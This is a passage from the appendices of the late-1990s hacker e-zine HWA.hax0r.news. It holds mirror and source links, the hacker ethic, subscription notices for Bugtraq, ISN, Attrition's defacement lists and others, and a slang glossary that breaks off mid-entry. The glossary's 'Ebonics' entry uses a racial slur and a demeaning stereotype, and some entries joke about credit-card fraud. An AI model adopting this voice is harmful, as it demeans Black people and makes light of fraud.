     our mirror sites! and p0lix for the (now expired) digitalgeeks archive
     tnx guys. 
     
     http://www.csoft.net/~hwa
     
     
     HWA.hax0r.news Mirror Sites:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
     http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
     http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
     http://www.attrition.org/hosted/hwa/
     http://www.attrition.org/~modify/texts/zines/HWA/     
     http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
     http://www.csoft.net/~hwa/           
     http://welcome.to/HWA.hax0r.news/ 
     http://www.attrition.org/~modify/texts/zines/HWA/
     http://www.projectgamma.com/archives/zines/hwa/
     http://www.403-security.org/Htmls/hwa.hax0r.news.htm
     
     
     @HWA
     
     
  
A.4  The hacker's Ethic (90's Style)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
     
     
          _   _            _             _    _____ _   _     _
         | | | | __ _  ___| | _____ _ __( )__| ____| |_| |__ (_) ___
         | |_| |/ _` |/ __| |/ / _ \ '__|/ __|  _| | __| '_ \| |/ __|
         |  _  | (_| | (__|   <  __/ |   \__ \ |___| |_| | | | | (__
         |_| |_|\__,_|\___|_|\_\___|_|   |___/_____|\__|_| |_|_|\___|



     Sadly, due to the traditional ignorance and sensationalizing of the mass
     media, the once-noble term hacker has become a perjorative.
     
     Among true computer people, being called a hacker is a compliment. One of
     the traits of the true hacker is a profoundly antibureaucratic and
     democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
     
     This ethic was best formulated by Steven Levy in his 1984 book Hackers:
     Heroes of the Computer Revolution. Its tenets are as follows:

      1 - Access to computers should be unlimited and total. 
      2 - All information should be free. 
      3 - Mistrust authority - promote decentralization. 
      4 - Hackers should be judged by their hacking not bogus criteria such as
          degrees, age, race, or position. 
      5 - You create art and beauty on a computer, 
      6 - Computers can change your life for the better. 

     The Internet as a whole reflects this ethic.
     
     @HWA
     
A.5  Sources *** (VERY incomplete)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                      ____
                     / ___|  ___  _   _ _ __ ___ ___ ___
                     \___ \ / _ \| | | | '__/ __/ _ Y __|
                      ___) | (_) | |_| | | | (_|  __|__ \
                     |____/ \___/ \__,_|_|  \___\___|___/


     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.


    News site.........................http://www.ukhackers.com/  *NEW*
    News site.........................http://www.hackernews.com.br/ *NEW* 
    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
   *News site (HNN) .....,............http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    General Security/Exploits.........http://packetstorm.securify.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/ 
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    
    * HNN Also archives back issues of their news, use the following url format
    
      http://www.hackernews.com/arch.html?012700
    
      where 01=Jan 27=Date 00=Year. They are archived here also as part of the
      compilation and broad archival concept we are trying to maintain with this
      publication. - Ed
    
    

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    win2kbugtraq
    <+others>
    
    @HWA
    
    
    
A.6 Resources
    ~~~~~~~~~     
                       ___
                      | _ \___ ______ _  _ _ _ __ ___ ___
                      |   / -_|_-< _ \ || | '_/ _/ -_|_-<
                      |_|_\___/__|___/\_,_|_| \__\___/__/


    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    PLEASE if you have any changes or additions for this section please
    mail them to cruciphux@dok.org. Thank you.
    
    
    http://www.newsnow.co.uk/-NewsFeed.Tech.htm  *NEW* from Tep
    
    http://www.cnn.com/SEARCH/
       
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
        
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
        
    http://www.ottawacitizen.com/business/
        
    http://search.yahoo.com.sg/search/news_sg?p=hack
        
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
        
    http://www.zdnet.com/zdtv/cybercrime/
        
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
        
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
        
    http://freespeech.org/eua/ Electronic Underground Affiliation
        
    http://ech0.cjb.net ech0 Security
    
    http://axon.jccc.net/hir/ Hackers Information Report
        
    http://net-security.org Net Security
        
    http://www.403-security.org Daily news and security related site
    
    http://www.hack.co.za/ Current exploits archive  ** BACK ONLINE AS OF FEB 22ND **
    
    ** Due to excessive network attacks this site was being mirrored 
       at http://www.siliconinc.net/hack/ if the above link is down again try here.
       
    Please send in links that you think should belong here to keep this section
    up to date, it is overdue updating!.   
    
        

A.7  Submissions/Hints/Tips/Etc
     ~~~~~~~~~~~~~~~~~~~~~~~~~~
    
            ____        _               _         _
           / ___| _   _| |__  _ __ ___ (_)___ ___(_) ___  _ __  ___
           \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
            ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
           |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/


    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care wether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed
    
    
    

A.8 Mailing list Info
    ~~~~~~~~~~~~~~~~~



    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
    
    
    ATTRITION.ORG's Website defacement mirror and announcement lists
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    http://www.attrition.org/mirror/attrition/    
    http://www.attrition.org/security/lists.html
    
    --
      
      defaced [web page defacement announce list]
      
      This is a public LOW VOLUME (1) mail list to circulate news/info on 
      defaced web sites. To subscribe to Defaced, send mail to 
      majordomo@attrition.org with "subscribe defaced" in the BODY of 
      the mail.
      
      There will be two types of posts to this list:
      
              1. brief announcements as we learn of a web defacement.
                 this will include the site, date, and who signed the 
                 hack. we will also include a URL of a mirror of the hack.
      
              2. at the end of the day, a summary will be posted
                 of all the hacks of the day. these can be found
                 on the mirror site listed under 'relevant links'
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: mcintyre@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
      (1) It is low volume on a normal day. On days of many defacements,
          traffic may be increased. On a few days, it is a virtual mail
          flood. You have been warned. ;)
      
    -=-
    
    --
      
      defaced summary [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced domains on a given day. To subscribe to Defaced-Summary, send mail to 
      majordomo@attrition.org with "subscribe defaced-summary" in the BODY of 
      the mail.
      
      There will be ONE type of post to this list:
      
              1. a single nightly piece of mail listing all reported
                 domains. the same information can be found on
                 http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
              
     -=-
     
      defaced GM [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced government and military domains on a given day. To subscribe to 
      Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" 
      in the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personell charged with tracking security incidents on
      government run networks.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
     
      --
      
      defaced alpha [web page defacement announce list]
      
      This is a low traffic mail list to announce via alpha-numeric
      pagers, all publicly defaced government and military domains 
      on a given day. To subscribe to Defaced-Alpha, send mail to 
      majordomo@attrition.org with "subscribe defaced-alpha" in 
      the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the information
                 will only include domain names. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personell charged with tracking security incidents on
      government run networks. Further, it is designed for 
      quick response and aimed at law enforcement agencies like
      DCIS and the FBI.
      
      To subscribe to this list, a special mail will be sent to YOUR
      alpha-numeric pager. A specific response must be made within
      12 hours of receiving the mail to be subscribed. If the response
      is not received, it is assumed the mail was not sent to your 
      pager.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
         
      
    -=-     
      

    


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

          

    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security 
      organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the
    originator of the message. Please do not "CC" the bugtraq reflector 
    address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words
    that you post on this list and that reproduction of those words without 
    your permission in any medium outside the distribution of this list may be
    challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)
    
    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

      I am pleased to inform you of several changes that will be occurring
      on June 5th. I hope you find them as exciting as I do.
      
      
      BUGTRAQ moves to a new home
      ---------------------------
      
      
      First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
      to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
      below. Other than the change of domains nothing of how the list
      is run changes. I am still the moderator. We play by the same rules.
      
      
      Security Focus will be providing mail archives for BUGTRAQ. The
      archives go back longer than Netspace's and are more complete than
      Geek-Girl's.
      
      
      The move will occur one week from today. You will not need to
      resubscribe. All your information, including subscription options
      will be moved transparently.
      
      
      Any of you using mail filters (e.g. procmail) to sort incoming
      mail into mail folders by examining the From address will have to
      update them to include the new address. The new address will be:
      
      
                            BUGTRAQ@SECURITYFOCUS.COM
      
      
      Security Focus also be providing a free searchable vulnerability
      database.
      
      
      BUGTRAQ es muy bueno
      --------------------
      
      
      It has also become apparent that there is a need for forums
      in the spirit of BUGTRAQ where non-English speaking people
      or people that don't feel comfortable speaking English can
      exchange information.
      
      
      As such I've decided to give BUGTRAQ in other languages a try.
      BUGTRAQ will continue to be the place to submit vulnerability
      information, but if you feel more comfortable using some other
      language you can give the other lists a try. All relevant information
      from the other lists which have not already been covered here
      will be translated and forwarded on by the list moderator.
      
      
      In the next couple of weeks we will be introducing BUGTRAQ-JP
      (Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
      and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
      from Argentina <http://www.core-sdi.com/> (the folks that brought you
      Secure Syslog and the SSH insertion attack).
      
      
      What is Security Focus?
      -----------------------
      
      
      Security Focus is an exercise in creating a community and a security
      resource. We hope to be able to provide a medium where useful and
      successful resources such as BUGTRAQ can occur, while at the same
      time providing a comprehensive source of security information. Aside
      from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
      herself!) have moved over to Security Focus to help us with building
      this new community. The other staff at Security Focus are largely derived
      from long time supporters of Bugtraq and the community in general. If
      you are interested in viewing the staff pages, please see the 'About'
      section on www.securityfocus.com.
      
      
      On the community creating front you will find a set of forums
      and mailing lists we hope you will find useful. A number of them
      are not scheduled to start for several weeks but starting today
      the following list is available:
      
      
      * Incidents' Mailing List. BUGTRAQ has always been about the
         discussion of new vulnerabilities. As such I normally don't approve
         messages about break-ins, trojans, viruses, etc with the exception
         of wide spread cases (Melissa, ADM worm, etc). The other choice
         people are usually left with is email CERT but this fails to
         communicate this important information to other that may be
         potentially affected.
      
      
         The Incidents mailing list is a lightly moderated mailing list to
         facilitate the quick exchange of security incident information.
         Topical items include such things as information about rootkits
         new trojan horses and viruses, source of attacks and tell-tale
         signs of intrusions.
      
      
         To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
         of:
      
      
                   SUBS INCIDENTS FirstName, LastName
      
      
      Shortly we'll also be introducing an Information Warfare forum along
      with ten other forums over the next two months. These forums will be
      built and moderated by people in the community as well as vendors who
      are willing to take part in the community building process.
      *Note to the vendors here* We have several security vendors who have
      agreed to run forums where they can participate in the online communities.
      If you would like to take part as well, mail Alfred Huger,
      ahuger@securityfocus.com.
      
      
      On the information resource front you find a large database of
      the following:
      
      
      * Vulnerabilities. We are making accessible a free vulnerability
         database. You can search it by vendor, product and keyword. You
         will find detailed information on the vulnerability and how to fix it,
         as well are links to reference information such as email messages,
         advisories and web pages. You can search by vendor, product and
         keywords. The database itself is the result of culling through 5
         years of BUGTRAQ plus countless other lists and news groups. It's
         a shining example of how thorough full disclosure has made a significant
         impact on the industry over the last half decade.
      
      
      * Products. An incredible number of categorized security products
         from over two hundred different vendors.
      
      
      * Services. A large and focused directory of security services offered by
         vendors.
      
      
      * Books, Papers and Articles. A vast number of categorized security
         related books, papers and articles. Available to download directly
         for our servers when possible.
      
      
      * Tools. A large array of free security tools. Categorized and
         available for download.
      
      
      * News: A vast number of security news articles going all the way
         back to 1995.
      
      
      * Security Resources: A directory to other security resources on
         the net.
      
      
      As well as many other things such as an event calendar.
      
      
      For your convenience the home-page can be personalized to display
      only information you may be interested in. You can filter by
      categories, keywords and operating systems, as well as configure
      how much data to display.
      
      
      I'd like to thank the fine folks at NETSPACE for hosting the
      site for as long as they have. Their services have been invaluable.
      
      
      I hope you find these changes for the best and the new services
      useful. I invite you to visit http://www.securityfocus.com/ and
      check it out for yourself. If you have any comments or suggestions
      please feel free to contact me at this address or at
      aleph1@securityfocus.com.
      
      
      Cheers.
      
      
      --
      Aleph One / aleph1@underground.org
      http://underground.org/
      KeyID 1024/948FD6B5
      Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
      



    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
      visit http://www.counterpane.com/unsubform.html. Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09

 ISSN 1004-042X

 Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
 News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
 Archivist: Brendan Kehoe
 Poof Reader: Etaion Shrdlu, Jr.
 Shadow-Archivists: Dan Carosone / Paul Southworth
 Ralph Sims / Jyrki Kuoppala
 Ian Dickinson
 Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed

    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
      
      --[ New ISN announcement (New!!)
      
      
      Sender:       ISN Mailing List <ISN@SECURITYFOCUS.COM>
      From:         mea culpa <jericho@DIMENSIONAL.COM>
      Subject:      Where has ISN been?
      Comments: To: InfoSec News <isn@securityfocus.com>
      To:           ISN@SECURITYFOCUS.COM
      
      
      It all starts long ago, on a network far away..
      
      
      Not really. Several months ago the system that hosted the ISN mail list
      was taken offline. Before that occured, I was not able to retrieve the
      subscriber list. Because of that, the list has been down for a while. I
      opted to wait to get the list back rather than attempt to make everyone
      resubscribe.
      
      
      As you can see from the headers, ISN is now generously being hosted by
      Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
      machine, and listserv that runs the list now.
      
      
      Hopefully, this message will find all ISN subscribers, help us weed out
      dead addresses, and assure you the list is still here. If you have found
      the list to be valuable in the past, please tell friends and associates
      about the list. To subscribe, mail listserv@securityfocus.com with
      "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
      
      
      As usual, comments and suggestions are welcome. I apologize for the down
      time of the list. Hopefully it won't happen again. ;)
      
      
      
      mea_culpa
      www.attrition.org
      
      
      
      --[ Old ISN welcome message
      
      
      [Last updated on: Mon Nov  04  0:11:23 1998]
      
      
      InfoSec News is a privately run, medium traffic list that caters 
      to distribution of information security news articles. These 
      articles will come from newspapers, magazines, online resources, 
      and more.
      
      
      The subject line will always contain the title of the article, so that
      you may quickly and effeciently filter past the articles of no interest.
      
      
      This list will contain:
      
      
      o       Articles catering to security, hacking, firewalls, new security
              encryption, products, public hacks, hoaxes, legislation affecting
              these topics and more.
      
      
      o       Information on where to obtain articles in current magazines.
      
      
      o       Security Book reviews and information.
      
      
      o       Security conference/seminar information.
      
      
      o       New security product information.
      
      
      o       And anything else that comes to mind..
      
      
      Feedback is encouraged. The list maintainers would like to hear what
      you think of the list, what could use improving, and which parts
      are "right on". Subscribers are also encouraged to submit articles
      or URLs. If you submit an article, please send either the URL or
      the article in ASCII text. Further, subscribers are encouraged to give
      feedback on articles or stories, which may be posted to the list.
      
      
      Please do NOT:
      
      
              * subscribe vanity mail forwards to this list
      
      
              * subscribe from 'free' mail addresses (ie: juno, hotmail)
      
      
              * enable vacation messages while subscribed to mail lists
      
      
              * subscribe from any account with a small quota
      
      
      All of these generate messages to the list owner and make tracking
      down dead accounts very difficult. I am currently receiving as many 
      as fifty returned mails a day. Any of the above are grounds for
      being unsubscribed. You are welcome to resubscribe when you address
      the issue(s).
      
      
      Special thanks to the following for continued contribution:
              William Knowles, Aleph One, Will Spencer, Jay Dyson,
              Nicholas Brawn, Felix von Leitner, Phreak Moi and 
              other contributers.
      
      
      ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
      ISN Archive: http://www.landfield.com/isn
      ISN Archive: http://www.jammed.com/Lists/ISN/
      
      
      ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
          private list. Moderation of topics, member subscription, and
          everything else about the list is solely at his discretion.
      
      
      The ISN membership list is NOT available for sale or disclosure.  
      
      
      ISN is a non-profit list. Sponsors are only donating to cover bandwidth 
          and server costs. 
          
          
     Win2k Security Advice Mailing List (new added Nov 30th)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
      To subscribe:
      
      
      send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
      to  listserv@listserv.ntsecurity.net
      
     
      
      Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
      questions or comments about the list please feel free to contact the list
      moderator, Steve Manzuik, at steve@win2ksecadvice.net.
      
      To see what you've missed recently on the list, or to research an item
      of interest, be sure to visit the Web-based archives located at:
      http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
      
      ==============
      NTSecurity.net brings the security community a brand new (Oct 99) and
      much-requested Windows security mailing list. This new moderated mailing list,
      Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open
      discussion of Windows-related security issues.
      
      With a firm and unwavering commitment towards timely full disclosure, this
      new resource promises to become a great forum for open discussion
      regarding security-related bugs, vulnerabilities, potential exploits, virus,
      worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
      and we openly invite all security minded individuals, be they white hat,
      gray hat, or black hat, to join the new mailing list.
      
      While Win2KSecAdvice was named in the spirit of Microsoft's impending product
      line name change, and meant to reflect the list's security focus both now and
      in the long run, it is by no means limited to security topics centered around
      Windows 2000. Any security issues that pertain to Windows-based networking are
      relevant for discussion, including all Windows operating systems, MS Office,
      MS BackOffice, and all related third party applications and hardware.
      
      The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
      a security risk, it's relevant to the list.
      
      The list archives are available on the Web at http://www.ntsecurity.net,
      which include a List Charter and FAQ, as well as Web-based searchable list
      archives for your research endeavors.
      
      SAVE THIS INFO FOR YOUR REFERENCE:
      
      To post to the list simply send your email to
      win2ksecadvice@listserv.ntsecurity.net
      
      To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
      listserv@listserv.ntsecurity.net
      
      Regards,
      
      Steve Manzuik, List Moderator
      Win2K Security Advice
      steve@win2ksecadvice.net     

    @HWA
    

A.9  Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pidgeon holed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up  and comers, i'd highly recommend you get that book. Its almost
     like  buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

A.10 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
                    _   ___        ___      _____ _    ___
                   | | | \ \      / / \    |  ___/ \  / _ \
                   | |_| |\ \ /\ / / _ \   | |_ / _ \| | | |
                   |  _  | \ V  V / ___ \ _|  _/ ___ \ |_| |
                   |_| |_|  \_/\_/_/   \_(_)_|/_/   \_\__\_\
                     

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal useage and use in this zine are
    listed below: Some are very useful, others attempt to deny the any possible
    attempts at eschewing obfuscation by obsucuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, 
            Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
